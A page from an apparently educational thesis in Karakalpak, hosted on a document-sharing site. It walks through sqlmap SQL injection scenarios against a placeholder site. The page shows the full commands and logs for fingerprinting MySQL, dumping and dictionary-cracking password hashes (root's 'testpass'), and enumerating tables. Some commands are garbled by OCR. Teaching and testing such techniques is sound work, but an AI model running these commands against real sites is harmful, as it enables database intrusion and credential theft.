Bitiruv malakaviy ishi


[02:01:45] [INFO] Fetched data logged to text fi les under '/opt/sqlmap/output/www.site.com'



Yüklə 0,65 Mb.
səhifə21/29
tarix17.06.2023
ölçüsü0,65 Mb.
#131897
1   ...   17   18   19   20   21   22   23   24   ...   29
Satbaeva

[02:01:45] [INFO] Fetched data logged to text fi les under '/opt/sqlmap/output/www.site.com'
Ssenariy 2
Endi biz tolıqlaw fingerprinting (-f) orınlawdı hám maǵlıwmatlar bazasın basqarıw sistemasınıń tekstli bannerin (--banner) alıwdı, jánede onıń atı, versiya nomeri hám paydalanıwshısın (--current user) alıwdı qáleymiz. Bunnan tısqarı, biz maǵlıwmatlar bazası saqlanǵan barlıq maǵlıwmatlar bazaları ushın sistema parolların esapqa almaǵan halda saqlanǵan parollardı keste atları (--tables) menen qızıqtıramız. Skanerdi iske túsiremiz:


$ python sqlmap.py -ol " http://www.site.com/vuln.php? id=1" --random-agent --tar -f -banner --current-user --passwords --tables - exclude -sysdbs

Biz soraǵan texnologiyalar boyınsha barlıq maǵlıwmatlardı alamız:




[[02:08:27] [INFO] fetching banner
[02:08:27] [INFO] actively fi ngerprinting MySQL
[02:08:27] [INFO] executing MySQL comment injection fi ngerprint

Error-based SQL injection web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: active fi ngerprint: MySQL >= 5.1.12 and < 5.5.0
comment injection fi ngerprint: MySQL 5.1.41
banner parsing fi ngerprint: MySQL 5.1.41
banner: '5.1.41-3~bpo50+1'

Keyingi orınd paydalanıwshı atı:




[02:08:28] [INFO] fetching current user
current user: 'root@localhost'

Keyin biz barlıq paydalanıwshı parollarınıń xeshlarin alamız hám sózlik járdeminde brute forse ámelge asıramız:




[02:08:28] [INFO] fetching database users password hashes
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] Y
[02:08:30] [INFO] using hash method 'mysql_passwd'
what dictionary do you want to use?
[02:08:32] [INFO] using default dictionary
[02:08:32] [INFO] loading dictionary from '/opt/sqlmap/txt/wordlist.txt'
do you want to use common password suffi xes? (slow!) [y/N] N
[02:08:33] [INFO] starting dictionary-based cracking (mysql_passwd)
[02:08:35] [INFO] cracked password 'testpass' for user 'root'
database management system users password hashes:
[] debian-sys-maint [1]:

password hash: *6B2C58EABD91C1776DA223B088B601604F898847
[] root [1]:
password hash: *00E247AC5F9AF26AE0194B41E1E769DEE1429A29
clear-text password: testpass

Root ushın biz paroldı taptıq. Bizdi qızıqtırǵan maǵlıwmatlardı anıqlaw waqıtı keldi:




[02:08:35] [INFO] fetching database names
[02:08:35] [INFO] fetching tables for databases: information_schema, mysql, owasp10, testdb
[02:08:35] [INFO] skipping system databases: information_schema, mysql

Database: owasp10
[3 tables]
+--------------+
| accounts |
| blogs_table |
| hitlog |
+--------------+
Database: testdb
[1 table]
+-------------+
| users |
+-------------+
[02:08:35] [INFO] Fetched data logged to text fi les under '/opt/sqlmap/output/www.site.com'

Keyingi etaplar usı tártipte alıp barıladı.


Ssenariy 3
Endi maǵlıwmatlar bazasında "users" atlı testdb kestesin (-D testdb) izlep tawǵanımız sebepli, onıń strukturasın ózimizge saqlap alamız(--dump). Bıraq fayldaǵı barlıq maǵlıwmatlardı nusqa kóshirmesten, kesteler quramın mashinada jaylasqan SQLite maǵlıwmatlar bazasına tákirarlaymız (- replicate).



Yüklə 0,65 Mb.

Dostları ilə paylaş:
1   ...   17   18   19   20   21   22   23   24   ...   29




Verilənlər bazası müəlliflik hüququ ilə müdafiə olunur ©azkurs.org 2024
rəhbərliyinə müraciət

gir | qeydiyyatdan keç
    Ana səhifə


yükləyin